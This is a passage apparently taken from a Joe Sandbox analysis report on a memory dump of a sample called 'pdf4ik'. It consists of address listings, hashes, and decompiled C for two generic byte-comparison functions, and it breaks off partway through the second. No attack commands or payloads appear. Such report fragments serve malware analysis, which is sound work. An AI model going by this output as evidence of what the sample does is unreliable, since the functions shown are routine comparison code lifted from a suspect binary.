                                        0x29d8b3b9
                                        0x29d8b3bf
                                        0x29d8b3c9
                                        0x29d8b3cf
                                        0x29d8b3d5
                                        0x29d8b3e1
                                        0x29d8b6f7
                                        0x29d8b6fd
                                        0x29d8b708
                                        0x29d8b708
                                        0x29d8b71d
                                        0x29d8b3e7
                                        0x29d8b3e7
                                        0x29d8b3f1
                                        0x29d8b412
                                        0x29d8b418
                                        0x29d8b41a
                                        0x29d8b422
                                        0x00000000
                                        0x00000000
                                        0x29d8b430
                                        0x29d8b430
                                        0x29d8b436
                                        0x29d8b43f
                                        0x29d8b5a4
                                        0x29d8b5b4
                                        0x29d8b5c3
                                        0x29d8b5cb
                                        0x29d8b5d6
                                        0x29d8b5d8
                                        0x29d8b5dd
                                        0x29d8b5fd
                                        0x29d8b605
                                        0x29d8b60e
                                        0x29d8b5df
                                        0x29d8b5e4
                                        0x29d8b5ec
                                        0x29d8b5f2
                                        0x29d8b5f2
                                        0x29d8b611
                                        0x29d8b5cd
                                        0x29d8b5cd
                                        0x29d8b5cd
                                        0x29d8b625
                                        0x29d8b62d
                                        0x29d8b635
                                        0x29d8b638
                                        0x29d8b63e
                                        0x29d8b647
                                        0x29d8b64a
                                        0x29d8b64c
                                        0x29d8b64e
                                        0x29d8b656
                                        0x29d8b656
                                        0x29d8b668
                                        0x29d8b66c
                                        0x29d8b670
                                        0x29d8b670
                                        0x29d8b672
                                        0x29d8b674
                                        0x29d8b670
                                        0x29d8b681
                                        0x29d8b683
                                        0x29d8b689
                                        0x29d8b699
                                        0x29d8b6a0
                                        0x29d8b6a0
                                        0x29d8b6af
                                        0x29d8b6b3
                                        0x29d8b6bc
                                        0x29d8b6bc
                                        0x00000000
                                        0x29d8b445
                                        0x29d8b44e
                                        0x29d8b454
                                        0x29d8b466
                                        0x29d8b466
                                        0x29d8b472
                                        0x29d8b478
                                        0x29d8b47a
                                        0x29d8b480
                                        0x29d8b484
                                        0x29d8b486
                                        0x29d8b486
                                        0x29d8b48e
                                        0x29d8b495
                                        0x29d8b49d
                                        0x29d8b49d
                                        0x29d8b49f
                                        0x29d8b4a8
                                        0x29d8b4aa
                                        0x29d8b4b2
                                        0x29d8b4b4
                                        0x29d8b4b7
                                        0x29d8b4c6
                                        0x29d8b4c6
                                        0x29d8b4c9
                                        0x29d8b4cf
                                        0x29d8b4d1
                                        0x29d8b4d5
                                        0x00000000
                                        0x00000000
                                        0x29d8b4d7
                                        0x29d8b4d8
                                        0x29d8b4dc
                                        0x29d8b4c0
                                        0x00000000
                                        0x29d8b4c0
                                        0x00000000
                                        0x29d8b4dc
                                        0x29d8b4c6
                                        0x29d8b4b7
                                        0x29d8b4de
                                        0x29d8b4e4
                                        0x29d8b4ed
                                        0x29d8b4f3
                                        0x29d8b4fb
                                        0x00000000
                                        0x29d8b501
                                        0x29d8b507
                                        0x29d8b510
                                        0x29d8b517
                                        0x29d8b51d
                                        0x29d8b525
                                        0x29d8b527
                                        0x29d8b52d
                                        0x29d8b535
                                        0x29d8b587
                                        0x29d8b537
                                        0x29d8b537
                                        0x29d8b543
                                        0x29d8b54a
                                        0x29d8b558
                                        0x29d8b560
                                        0x29d8b567
                                        0x29d8b576
                                        0x29d8b578
                                        0x29d8b57b
                                        0x29d8b57b
                                        0x29d8b58f
                                        0x29d8b598
                                        0x29d8b460
                                        0x29d8b466
                                        0x29d8b472
                                        0x29d8b478
                                        0x29d8b47a
                                        0x29d8b480
                                        0x29d8b484
                                        0x29d8b486
                                        0x29d8b486
                                        0x29d8b48e
                                        0x29d8b495
                                        0x29d8b49d
                                        0x29d8b49d
                                        0x00000000
                                        0x29d8b59e
                                        0x29d8b59e
                                        0x00000000
                                        0x29d8b59e
                                        0x29d8b598
                                        0x00000000
                                        0x29d8b4fb
                                        0x29d8b466
                                        0x00000000
                                        0x29d8b6c2
                                        0x29d8b6c9
                                        0x29d8b6c9
                                        0x29d8b6d5
                                        0x29d8b6db
                                        0x29d8b6e2
                                        0x29d8b6e3
                                        0x29d8b6ef
                                        0x29d8b410
                                        0x00000000
                                        0x29d8b6f5
                                        0x29d8b6f5
                                        0x00000000
                                        0x29d8b6f5
                                        0x00000000
                                        0x29d8b6ef
                                        0x29d8b412
                                        0x29d8b3e1
                                        0x29d8b2eb
                                        0x29d8b2f0
                                        0x29d8b2f0
                                        0x29d8b2f4
                                        0x00000000
                                        0x00000000
                                        0x29d8b2fa
                                        0x29d8b2fb
                                        0x29d8b2ff
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d8b2ff
                                        0x29d8b3f9
                                        0x29d8b40e
                                        0x29d8b40e
                                        0x29d8b27b
                                        0x29d8b27b
                                        0x29d8b27d
                                        0x29d8b291
                                        0x29d8b291
                                        0x00000000

                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c95593ca24c9f6d9f0c8856b0928ba0c2945fb95fb1fe3db055df8bf12a44c88
                                        • Instruction ID: dc106b218b5b734ecf949ede02c52b9a3395f07c57bc83b54710c0f1c6e89475
                                        • Opcode Fuzzy Hash: c95593ca24c9f6d9f0c8856b0928ba0c2945fb95fb1fe3db055df8bf12a44c88
                                        • Instruction Fuzzy Hash: 38F10771E002298FDB24CF68D881B9DB7B2BF89354F1581EEC44DA7742DA349A86DF50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DBAC02 Relevance: .4, Instructions: 355COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E29DBAC02(void* __eax, void* __ecx) {
				void* _t196;
				signed int _t197;
				void* _t200;
				signed char _t205;
				signed char _t206;
				signed char _t207;
				signed char _t209;
				signed char _t210;
				signed int _t215;
				signed int _t291;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t312;
				void* _t314;
				void* _t316;
				void* _t319;
				void* _t321;
				void* _t323;
				void* _t326;
				void* _t328;
				void* _t330;
				void* _t333;
				void* _t335;
				void* _t337;

				_t200 = __ecx;
				_t196 = __eax;
				if( *((intOrPtr*)(__eax - 0x1f)) ==  *((intOrPtr*)(__ecx - 0x1f))) {
					_t291 = 0;
					L17:
					if(_t291 != 0) {
						goto L1;
					}
					_t205 =  *(_t196 - 0x1b);
					if(_t205 ==  *(_t200 - 0x1b)) {
						_t291 = 0;
						L28:
						if(_t291 != 0) {
							goto L1;
						}
						_t206 =  *(_t196 - 0x17);
						if(_t206 ==  *(_t200 - 0x17)) {
							_t291 = 0;
							L39:
							if(_t291 != 0) {
								goto L1;
							}
							_t207 =  *(_t196 - 0x13);
							if(_t207 ==  *(_t200 - 0x13)) {
								_t291 = 0;
								L50:
								if(_t291 != 0) {
									goto L1;
								}
								if( *(_t196 - 0xf) ==  *(_t200 - 0xf)) {
									_t291 = 0;
									L61:
									if(_t291 != 0) {
										goto L1;
									}
									_t209 =  *(_t196 - 0xb);
									if(_t209 ==  *(_t200 - 0xb)) {
										_t291 = 0;
										L72:
										if(_t291 != 0) {
											goto L1;
										}
										_t210 =  *(_t196 - 7);
										if(_t210 ==  *(_t200 - 7)) {
											_t291 = 0;
											L83:
											if(_t291 != 0) {
												goto L1;
											}
											_t294 = ( *(_t196 - 3) & 0x000000ff) - ( *(_t200 - 3) & 0x000000ff);
											if(_t294 == 0) {
												L5:
												_t296 = ( *(_t196 - 2) & 0x000000ff) - ( *(_t200 - 2) & 0x000000ff);
												if(_t296 == 0) {
													L3:
													_t197 = ( *(_t196 - 1) & 0x000000ff) - ( *(_t200 - 1) & 0x000000ff);
													if(_t197 != 0) {
														_t8 = (0 | _t197 > 0x00000000) - 1; // -1
														_t197 = (_t197 > 0) + _t8;
													}
													L2:
													return _t197;
												}
												_t215 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
												if(_t215 != 0) {
													L86:
													_t197 = _t215;
													goto L2;
												} else {
													goto L3;
												}
											}
											_t215 = (0 | _t294 > 0x00000000) + (0 | _t294 > 0x00000000) - 1;
											if(_t215 == 0) {
												goto L5;
											}
											goto L86;
										}
										_t298 = (_t210 & 0x000000ff) - ( *(_t200 - 7) & 0x000000ff);
										if(_t298 == 0) {
											L76:
											_t300 = ( *(_t196 - 6) & 0x000000ff) - ( *(_t200 - 6) & 0x000000ff);
											if(_t300 == 0) {
												L78:
												_t302 = ( *(_t196 - 5) & 0x000000ff) - ( *(_t200 - 5) & 0x000000ff);
												if(_t302 == 0) {
													L80:
													_t291 = ( *(_t196 - 4) & 0x000000ff) - ( *(_t200 - 4) & 0x000000ff);
													if(_t291 != 0) {
														_t189 = (0 | _t291 > 0x00000000) - 1; // -1
														_t291 = (_t291 > 0) + _t189;
													}
													goto L83;
												}
												_t183 = (0 | _t302 > 0x00000000) - 1; // -1
												_t291 = (_t302 > 0) + _t183;
												if(_t291 != 0) {
													goto L1;
												}
												goto L80;
											}
											_t177 = (0 | _t300 > 0x00000000) - 1; // -1
											_t291 = (_t300 > 0) + _t177;
											if(_t291 != 0) {
												goto L1;
											}
											goto L78;
										}
										_t171 = (0 | _t298 > 0x00000000) - 1; // -1
										_t291 = (_t298 > 0) + _t171;
										if(_t291 != 0) {
											goto L1;
										}
										goto L76;
									}
									_t305 = (_t209 & 0x000000ff) - ( *(_t200 - 0xb) & 0x000000ff);
									if(_t305 == 0) {
										L65:
										_t307 = ( *(_t196 - 0xa) & 0x000000ff) - ( *(_t200 - 0xa) & 0x000000ff);
										if(_t307 == 0) {
											L67:
											_t309 = ( *(_t196 - 9) & 0x000000ff) - ( *(_t200 - 9) & 0x000000ff);
											if(_t309 == 0) {
												L69:
												_t291 = ( *(_t196 - 8) & 0x000000ff) - ( *(_t200 - 8) & 0x000000ff);
												if(_t291 != 0) {
													_t164 = (0 | _t291 > 0x00000000) - 1; // -1
													_t291 = (_t291 > 0) + _t164;
												}
												goto L72;
											}
											_t158 = (0 | _t309 > 0x00000000) - 1; // -1
											_t291 = (_t309 > 0) + _t158;
											if(_t291 != 0) {
												goto L1;
											}
											goto L69;
										}
										_t152 = (0 | _t307 > 0x00000000) - 1; // -1
										_t291 = (_t307 > 0) + _t152;
										if(_t291 != 0) {
											goto L1;
										}
										goto L67;
									}
									_t146 = (0 | _t305 > 0x00000000) - 1; // -1
									_t291 = (_t305 > 0) + _t146;
									if(_t291 != 0) {
										goto L1;
									}
									goto L65;
								}
								_t312 = ( *(_t196 - 0xf) & 0x000000ff) - ( *(_t200 - 0xf) & 0x000000ff);
								if(_t312 == 0) {
									L54:
									_t314 = ( *(_t196 - 0xe) & 0x000000ff) - ( *(_t200 - 0xe) & 0x000000ff);
									if(_t314 == 0) {
										L56:
										_t316 = ( *(_t196 - 0xd) & 0x000000ff) - ( *(_t200 - 0xd) & 0x000000ff);
										if(_t316 == 0) {
											L58:
											_t291 = ( *(_t196 - 0xc) & 0x000000ff) - ( *(_t200 - 0xc) & 0x000000ff);
											if(_t291 != 0) {
												_t139 = (0 | _t291 > 0x00000000) - 1; // -1
												_t291 = (_t291 > 0) + _t139;
											}
											goto L61;
										}
										_t133 = (0 | _t316 > 0x00000000) - 1; // -1
										_t291 = (_t316 > 0) + _t133;
										if(_t291 != 0) {
											goto L1;
										}
										goto L58;
									}
									_t127 = (0 | _t314 > 0x00000000) - 1; // -1
									_t291 = (_t314 > 0) + _t127;
									if(_t291 != 0) {
										goto L1;
									}
									goto L56;
								}
								_t121 = (0 | _t312 > 0x00000000) - 1; // -1
								_t291 = (_t312 > 0) + _t121;
								if(_t291 != 0) {
									goto L1;
								}
								goto L54;
							}
							_t319 = (_t207 & 0x000000ff) - ( *(_t200 - 0x13) & 0x000000ff);
							if(_t319 == 0) {
								L43:
								_t321 = ( *(_t196 - 0x12) & 0x000000ff) - ( *(_t200 - 0x12) & 0x000000ff);
								if(_t321 == 0) {
									L45:
									_t323 = ( *(_t196 - 0x11) & 0x000000ff) - ( *(_t200 - 0x11) & 0x000000ff);
									if(_t323 == 0) {
										L47:
										_t291 = ( *(_t196 - 0x10) & 0x000000ff) - ( *(_t200 - 0x10) & 0x000000ff);
										if(_t291 != 0) {
											_t113 = (0 | _t291 > 0x00000000) - 1; // -1
											_t291 = (_t291 > 0) + _t113;
										}
										goto L50;
									}
									_t107 = (0 | _t323 > 0x00000000) - 1; // -1
									_t291 = (_t323 > 0) + _t107;
									if(_t291 != 0) {
										goto L1;
									}
									goto L47;
								}
								_t101 = (0 | _t321 > 0x00000000) - 1; // -1
								_t291 = (_t321 > 0) + _t101;
								if(_t291 != 0) {
									goto L1;
								}
								goto L45;
							}
							_t95 = (0 | _t319 > 0x00000000) - 1; // -1
							_t291 = (_t319 > 0) + _t95;
							if(_t291 != 0) {
								goto L1;
							}
							goto L43;
						}
						_t326 = (_t206 & 0x000000ff) - ( *(_t200 - 0x17) & 0x000000ff);
						if(_t326 == 0) {
							L32:
							_t328 = ( *(_t196 - 0x16) & 0x000000ff) - ( *(_t200 - 0x16) & 0x000000ff);
							if(_t328 == 0) {
								L34:
								_t330 = ( *(_t196 - 0x15) & 0x000000ff) - ( *(_t200 - 0x15) & 0x000000ff);
								if(_t330 == 0) {
									L36:
									_t291 = ( *(_t196 - 0x14) & 0x000000ff) - ( *(_t200 - 0x14) & 0x000000ff);
									if(_t291 != 0) {
										_t88 = (0 | _t291 > 0x00000000) - 1; // -1
										_t291 = (_t291 > 0) + _t88;
									}
									goto L39;
								}
								_t82 = (0 | _t330 > 0x00000000) - 1; // -1
								_t291 = (_t330 > 0) + _t82;
								if(_t291 != 0) {
									goto L1;
								}
								goto L36;
							}
							_t76 = (0 | _t328 > 0x00000000) - 1; // -1
							_t291 = (_t328 > 0) + _t76;
							if(_t291 != 0) {
								goto L1;
							}
							goto L34;
						}
						_t70 = (0 | _t326 > 0x00000000) - 1; // -1
						_t291 = (_t326 > 0) + _t70;
						if(_t291 != 0) {
							goto L1;
						}
						goto L32;
					}
					_t333 = (_t205 & 0x000000ff) - ( *(_t200 - 0x1b) & 0x000000ff);
					if(_t333 == 0) {
						L21:
						_t335 = ( *(_t196 - 0x1a) & 0x000000ff) - ( *(_t200 - 0x1a) & 0x000000ff);
						if(_t335 == 0) {
							L23:
							_t337 = ( *(_t196 - 0x19) & 0x000000ff) - ( *(_t200 - 0x19) & 0x000000ff);
							if(_t337 == 0) {
								L25:
								_t291 = ( *(_t196 - 0x18) & 0x000000ff) - ( *(_t200 - 0x18) & 0x000000ff);
								if(_t291 != 0) {
									_t63 = (0 | _t291 > 0x00000000) - 1; // -1
									_t291 = (_t291 > 0) + _t63;
								}
								goto L28;
							}
							_t57 = (0 | _t337 > 0x00000000) - 1; // -1
							_t291 = (_t337 > 0) + _t57;
							if(_t291 != 0) {
								goto L1;
							}
							goto L25;
						}
						_t51 = (0 | _t335 > 0x00000000) - 1; // -1
						_t291 = (_t335 > 0) + _t51;
						if(_t291 != 0) {
							goto L1;
						}
						goto L23;
					}
					_t45 = (0 | _t333 > 0x00000000) - 1; // -1
					_t291 = (_t333 > 0) + _t45;
					if(_t291 != 0) {
						goto L1;
					}
					goto L21;
				} else {
					__edx =  *(__ecx - 0x1f) & 0x000000ff;
					__esi =  *(__eax - 0x1f) & 0x000000ff;
					__esi = ( *(__eax - 0x1f) & 0x000000ff) - ( *(__ecx - 0x1f) & 0x000000ff);
					if(__esi == 0) {
						L10:
						__esi =  *(__eax - 0x1e) & 0x000000ff;
						__edx =  *(__ecx - 0x1e) & 0x000000ff;
						__esi = ( *(__eax - 0x1e) & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
						if(__esi == 0) {
							L12:
							__esi =  *(__eax - 0x1d) & 0x000000ff;
							__edx =  *(__ecx - 0x1d) & 0x000000ff;
							__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
							if(__esi == 0) {
								L14:
								__esi =  *(__eax - 0x1c) & 0x000000ff;
								__edx =  *(__ecx - 0x1c) & 0x000000ff;
								__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
								if(__esi != 0) {
									__edx = 0;
									_t38 = (0 | __esi > 0x00000000) - 1; // -1
									__esi = (__esi > 0) + _t38;
								}
								goto L17;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t32 = __edx - 1; // -1
							__esi = __edx + _t32;
							if(__edx + _t32 != 0) {
								goto L1;
							}
							goto L14;
						}
						__edx = 0;
						__edx = 0 | __esi > 0x00000000;
						_t26 = __edx - 1; // -1
						__esi = __edx + _t26;
						if(__edx + _t26 != 0) {
							goto L1;
						}
						goto L12;
					}
					__edx = 0;
					__edx = 0 | __esi > 0x00000000;
					_t20 = __edx - 1; // -1
					__esi = __edx + _t20;
					if(__edx + _t20 != 0) {
						goto L1;
					}
					goto L10;
				}
				L1:
				_t197 = _t291;
				goto L2;
			}

































                                        0x29dbac02
                                        0x29dbac02
                                        0x29dbac08
                                        0x29dbac80
                                        0x29dbac82
                                        0x29dbac84
                                        0x00000000
                                        0x00000000
                                        0x29dbac8a
                                        0x29dbac90
                                        0x29dbad07
                                        0x29dbad09
                                        0x29dbad0b
                                        0x00000000
                                        0x00000000
                                        0x29dbad11
                                        0x29dbad17
                                        0x29dbad8e
                                        0x29dbad90
                                        0x29dbad92
                                        0x00000000
                                        0x00000000
                                        0x29dbad98
                                        0x29dbad9e
                                        0x29dbae15
                                        0x29dbae17
                                        0x29dbae19
                                        0x00000000
                                        0x00000000
                                        0x29dbae25
                                        0x29dbae9d
                                        0x29dbae9f
                                        0x29dbaea1
                                        0x00000000
                                        0x00000000
                                        0x29dbaea7
                                        0x29dbaead
                                        0x29dbaf24
                                        0x29dbaf26
                                        0x29dbaf28
                                        0x00000000
                                        0x00000000
                                        0x29dbaf2e
                                        0x29dbaf34
                                        0x29dbafab
                                        0x29dbafad
                                        0x29dbafaf
                                        0x00000000
                                        0x00000000
                                        0x29dbafbd
                                        0x29dbafbf
                                        0x29dbabda
                                        0x29dbabe2
                                        0x29dbabe4
                                        0x29dba7fa
                                        0x29dba802
                                        0x29dba804
                                        0x29dba811
                                        0x29dba811
                                        0x29dba811
                                        0x29dba442
                                        0x29dbb0e6
                                        0x29dbb0e6
                                        0x29dbabf1
                                        0x29dbabf7
                                        0x29dbafd8
                                        0x29dbafd8
                                        0x00000000
                                        0x29dbabfd
                                        0x00000000
                                        0x29dbabfd
                                        0x29dbabf7
                                        0x29dbafcc
                                        0x29dbafd2
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dbafd2
                                        0x29dbaf3d
                                        0x29dbaf3f
                                        0x29dbaf54
                                        0x29dbaf5c
                                        0x29dbaf5e
                                        0x29dbaf73
                                        0x29dbaf7b
                                        0x29dbaf7d
                                        0x29dbaf92
                                        0x29dbaf9a
                                        0x29dbaf9c
                                        0x29dbafa5
                                        0x29dbafa5
                                        0x29dbafa5
                                        0x00000000
                                        0x29dbaf9c
                                        0x29dbaf86
                                        0x29dbaf86
                                        0x29dbaf8c
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dbaf8c
                                        0x29dbaf67
                                        0x29dbaf67
                                        0x29dbaf6d
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dbaf6d
                                        0x29dbaf48
                                        0x29dbaf48
                                        0x29dbaf4e
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dbaf4e
                                        0x29dbaeb6
                                        0x29dbaeb8
                                        0x29dbaecd
                                        0x29dbaed5
                                        0x29dbaed7
                                        0x29dbaeec
                                        0x29dbaef4
                                        0x29dbaef6
                                        0x29dbaf0b
                                        0x29dbaf13
                                        0x29dbaf15
                                        0x29dbaf1e
                                        0x29dbaf1e
                                        0x29dbaf1e
                                        0x00000000
                                        0x29dbaf15
                                        0x29dbaeff
                                        0x29dbaeff
                                        0x29dbaf05
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dbaf05
                                        0x29dbaee0
                                        0x29dbaee0
                                        0x29dbaee6
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dbaee6
                                        0x29dbaec1
                                        0x29dbaec1
                                        0x29dbaec7
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dbaec7
                                        0x29dbae2f
                                        0x29dbae31
                                        0x29dbae46
                                        0x29dbae4e
                                        0x29dbae50
                                        0x29dbae65
                                        0x29dbae6d
                                        0x29dbae6f
                                        0x29dbae84
                                        0x29dbae8c
                                        0x29dbae8e
                                        0x29dbae97
                                        0x29dbae97
                                        0x29dbae97
                                        0x00000000
                                        0x29dbae8e
                                        0x29dbae78
                                        0x29dbae78
                                        0x29dbae7e
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dbae7e
                                        0x29dbae59
                                        0x29dbae59
                                        0x29dbae5f
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dbae5f
                                        0x29dbae3a
                                        0x29dbae3a
                                        0x29dbae40
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dbae40
                                        0x29dbada7
                                        0x29dbada9
                                        0x29dbadbe
                                        0x29dbadc6
                                        0x29dbadc8
                                        0x29dbaddd
                                        0x29dbade5
                                        0x29dbade7
                                        0x29dbadfc
                                        0x29dbae04
                                        0x29dbae06
                                        0x29dbae0f
                                        0x29dbae0f
                                        0x29dbae0f
                                        0x00000000
                                        0x29dbae06
                                        0x29dbadf0
                                        0x29dbadf0
                                        0x29dbadf6
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dbadf6
                                        0x29dbadd1
                                        0x29dbadd1
                                        0x29dbadd7
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dbadd7
                                        0x29dbadb2
                                        0x29dbadb2
                                        0x29dbadb8
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dbadb8
                                        0x29dbad20
                                        0x29dbad22
                                        0x29dbad37
                                        0x29dbad3f
                                        0x29dbad41
                                        0x29dbad56
                                        0x29dbad5e
                                        0x29dbad60
                                        0x29dbad75
                                        0x29dbad7d
                                        0x29dbad7f
                                        0x29dbad88
                                        0x29dbad88
                                        0x29dbad88
                                        0x00000000
                                        0x29dbad7f
                                        0x29dbad69
                                        0x29dbad69
                                        0x29dbad6f
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dbad6f
                                        0x29dbad4a
                                        0x29dbad4a
                                        0x29dbad50
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dbad50
                                        0x29dbad2b
                                        0x29dbad2b
                                        0x29dbad31
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dbad31
                                        0x29dbac99
                                        0x29dbac9b
                                        0x29dbacb0
                                        0x29dbacb8
                                        0x29dbacba
                                        0x29dbaccf
                                        0x29dbacd7
                                        0x29dbacd9
                                        0x29dbacee
                                        0x29dbacf6
                                        0x29dbacf8
                                        0x29dbad01
                                        0x29dbad01
                                        0x29dbad01
                                        0x00000000
                                        0x29dbacf8
                                        0x29dbace2
                                        0x29dbace2
                                        0x29dbace8
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dbace8
                                        0x29dbacc3
                                        0x29dbacc3
                                        0x29dbacc9
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dbacc9
                                        0x29dbaca4
                                        0x29dbaca4
                                        0x29dbacaa
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dbac0a
                                        0x29dbac0a
                                        0x29dbac0e
                                        0x29dbac12
                                        0x29dbac14
                                        0x29dbac29
                                        0x29dbac29
                                        0x29dbac2d
                                        0x29dbac31
                                        0x29dbac33
                                        0x29dbac48
                                        0x29dbac48
                                        0x29dbac4c
                                        0x29dbac50
                                        0x29dbac52
                                        0x29dbac67
                                        0x29dbac67
                                        0x29dbac6b
                                        0x29dbac6f
                                        0x29dbac71
                                        0x29dbac73
                                        0x29dbac7a
                                        0x29dbac7a
                                        0x29dbac7a
                                        0x00000000
                                        0x29dbac71
                                        0x29dbac54
                                        0x29dbac58
                                        0x29dbac5b
                                        0x29dbac5b
                                        0x29dbac61
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dbac61
                                        0x29dbac35
                                        0x29dbac39
                                        0x29dbac3c
                                        0x29dbac3c
                                        0x29dbac42
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dbac42
                                        0x29dbac16
                                        0x29dbac1a
                                        0x29dbac1d
                                        0x29dbac1d
                                        0x29dbac23
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dbac23
                                        0x29dba0a3
                                        0x29dba0a3
                                        0x00000000

                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                        • Instruction ID: a6e4058f5495fda022831255ab5e3f047865c8240ad245a000140b5324d1e9ec
                                        • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                        • Instruction Fuzzy Hash: B7C1A173D1E5B305872A462D453822EFFE26EC1A4131BC399DDD53F98AC627AE02A5D0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DBA81A Relevance: .3, Instructions: 349COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E29DBA81A(void* __eax, void* __ecx) {
				void* _t191;
				signed int _t192;
				void* _t195;
				signed char _t200;
				signed char _t201;
				signed char _t202;
				signed char _t203;
				signed char _t205;
				signed int _t210;
				signed int _t284;
				void* _t287;
				void* _t289;
				void* _t291;
				void* _t293;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t310;
				void* _t312;
				void* _t314;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t324;
				void* _t326;
				void* _t328;

				_t195 = __ecx;
				_t191 = __eax;
				if( *((intOrPtr*)(__eax - 0x1e)) ==  *((intOrPtr*)(__ecx - 0x1e))) {
					_t284 = 0;
					L15:
					if(_t284 != 0) {
						goto L1;
					}
					_t200 =  *(_t191 - 0x1a);
					if(_t200 ==  *(_t195 - 0x1a)) {
						_t284 = 0;
						L26:
						if(_t284 != 0) {
							goto L1;
						}
						_t201 =  *(_t191 - 0x16);
						if(_t201 ==  *(_t195 - 0x16)) {
							_t284 = 0;
							L37:
							if(_t284 != 0) {
								goto L1;
							}
							_t202 =  *(_t191 - 0x12);
							if(_t202 ==  *(_t195 - 0x12)) {
								_t284 = 0;
								L48:
								if(_t284 != 0) {
									goto L1;
								}
								_t203 =  *(_t191 - 0xe);
								if(_t203 ==  *(_t195 - 0xe)) {
									_t284 = 0;
									L59:
									if(_t284 != 0) {
										goto L1;
									}
									if( *(_t191 - 0xa) ==  *(_t195 - 0xa)) {
										_t284 = 0;
										L70:
										if(_t284 != 0) {
											goto L1;
										}
										_t205 =  *(_t191 - 6);
										if(_t205 ==  *(_t195 - 6)) {
											_t284 = 0;
											L81:
											if(_t284 != 0) {
												goto L1;
											}
											if( *(_t191 - 2) ==  *(_t195 - 2)) {
												_t192 = 0;
												L3:
												return _t192;
											}
											_t287 = ( *(_t191 - 2) & 0x000000ff) - ( *(_t195 - 2) & 0x000000ff);
											if(_t287 == 0) {
												L4:
												_t192 = ( *(_t191 - 1) & 0x000000ff) - ( *(_t195 - 1) & 0x000000ff);
												if(_t192 != 0) {
													_t8 = (0 | _t192 > 0x00000000) - 1; // -1
													_t192 = (_t192 > 0) + _t8;
												}
												goto L3;
											}
											_t210 = (0 | _t287 > 0x00000000) + (0 | _t287 > 0x00000000) - 1;
											if(_t210 != 0) {
												_t192 = _t210;
												goto L3;
											}
											goto L4;
										}
										_t289 = (_t205 & 0x000000ff) - ( *(_t195 - 6) & 0x000000ff);
										if(_t289 == 0) {
											L74:
											_t291 = ( *(_t191 - 5) & 0x000000ff) - ( *(_t195 - 5) & 0x000000ff);
											if(_t291 == 0) {
												L76:
												_t293 = ( *(_t191 - 4) & 0x000000ff) - ( *(_t195 - 4) & 0x000000ff);
												if(_t293 == 0) {
													L78:
													_t284 = ( *(_t191 - 3) & 0x000000ff) - ( *(_t195 - 3) & 0x000000ff);
													if(_t284 != 0) {
														_t182 = (0 | _t284 > 0x00000000) - 1; // -1
														_t284 = (_t284 > 0) + _t182;
													}
													goto L81;
												}
												_t176 = (0 | _t293 > 0x00000000) - 1; // -1
												_t284 = (_t293 > 0) + _t176;
												if(_t284 != 0) {
													goto L1;
												}
												goto L78;
											}
											_t170 = (0 | _t291 > 0x00000000) - 1; // -1
											_t284 = (_t291 > 0) + _t170;
											if(_t284 != 0) {
												goto L1;
											}
											goto L76;
										}
										_t164 = (0 | _t289 > 0x00000000) - 1; // -1
										_t284 = (_t289 > 0) + _t164;
										if(_t284 != 0) {
											goto L1;
										}
										goto L74;
									}
									_t296 = ( *(_t191 - 0xa) & 0x000000ff) - ( *(_t195 - 0xa) & 0x000000ff);
									if(_t296 == 0) {
										L63:
										_t298 = ( *(_t191 - 9) & 0x000000ff) - ( *(_t195 - 9) & 0x000000ff);
										if(_t298 == 0) {
